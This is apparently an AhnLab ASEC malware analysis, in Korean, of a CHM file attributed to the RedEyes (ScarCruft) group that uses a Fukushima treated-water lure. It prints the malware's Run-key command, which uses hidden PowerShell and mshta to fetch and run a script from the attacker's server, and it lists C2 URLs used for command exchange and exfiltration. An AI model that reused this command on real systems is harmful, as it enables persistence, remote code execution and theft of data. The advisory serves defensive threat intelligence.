후쿠시마 오염수 방류 내용을 이용한 CHM 악성코드 : RedEyes(ScarCruft)

ASEC(AhnLab Security Emergency response Center) 분석팀은 RedEyes 공격 그룹이 제작한 것으로 추정되는 CHM 악성코드가 최근 다시 유포되고 있는 정황을 포착하였다. 최근 유포 중인 CHM 악성코드는 지난 3월에 소개한 “국내 금융 기업 보안 메일을 사칭한 CHM 악성코드”[1] 와 유사한 방식으로 동작하며, 이번에도 RedEyes 그룹의 M2RAT 악성코드 공격 과정 중 “2.3. 지속성 유지 (Persistence)”[2] 과정에서 사용된 명령어가 동일하게 확인되었다.

이번 공격에는 후쿠시마 오염수 방류 내용을 이용하였는데 공격자는 국내 이슈가 되는 주제를 통해 사용자의 궁금증을 유발하여 악성 파일을 실행하도록 유도한다. 해당 내용은 [그림 1] 과 같이, CHM 악성코드 실행 시 생성되는 도움말 창에서 확인할 수 있다.

해당 과정에서 실행되는 악성 스크립트는 [그림 2] 와 같다. 기존에는 mshta 명령어를 CHM 파일(hh.exe)에서 바로 실행하던 방식이였지만, 최근 유포되는 파일에서는 RUN 키에 해당 명령어를 등록하여 시스템이 재부팅될 때 실행하도록 변경되었다.

• RUN 키 등록
  레지스트리 경로 : HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  값 이름 : fGZtm
  값 : c:\windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 391763 2.2.2.2 || mshta hxxp://navercorp[.]ru/dashboard/image/202302/4.html

RUN 키에 등록된 명령어가 동작하게 되면, mshta 를 통해 특정 URL 에 존재하는 추가 스크립트가 실행된다. 해당 URL 에는 JS(JavaScript) 코드가 포함되어 있으며, 해당 코드는 인코딩된 파워쉘 명령어를 실행하는 기능을 수행한다. 해당 과정은 기존에 소개했던 CHM 악성코드 및 M2RAT 악성코드 공격 과정에서 사용된 명령어와 유사한 형태이다.

디코딩된 파워쉘 명령어는 지속성을 위한 RUN 키 등록, 공격자 서버로부터 명령어 수신, 명령 실행 결과 전달의 기능을 수행하는 백도어 유형이다. 공격자 서버로부터 명령어를 수신 받으며 명령어에 따라 파일 업로드 및 다운로드, 특정 파일 정보 전송, 레지스트리 편집 등 다양한 악성 행위를 수행할 수 있다.

• C2
  hxxp://navercorp[.]ru/dashboard/image/202302/com.php?U=[컴퓨터이름]-[유저이름] // 공격자 명령 수신hxxp://navercorp[.]ru/dashboard/image/202302/com.php?R=[BASE64 인코딩] // 명령 실행 결과 전달

해당 유형의 악성코드에 감염될 경우 공격자의 명령에 따라 추가 파일 다운로드 및 정보 탈취 등 다양한 악성 행위를 수행할 수 있게 되며 큰 피해를 입을 수 있다. 특히, 국내 사용자를 대상으로 유포하는 악성코드는 유포 대상에 따라 관심 있는 주제의 내용을 포함하여 사용자의 실행을 유도하기 때문에 출처가 불분명한 메일의 열람을 자제하고 첨부된 파일은 실행하지 않도록 해야 한다. 또한, 주기적으로 PC 검사를 진행하고 보안 제품을 최신 엔진으로 업데이트해야 한다.

[파일 진단]
Downloader/CHM.Generic (2023.09.02.00)

[IOC]
52f71fadf0ea5ffacd753e83a3d0af1a
hxxp://navercorp[.]ru/dashboard/image/202302/4.html
hxxp://navercorp[.]ru/dashboard/image/202302/com.php

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.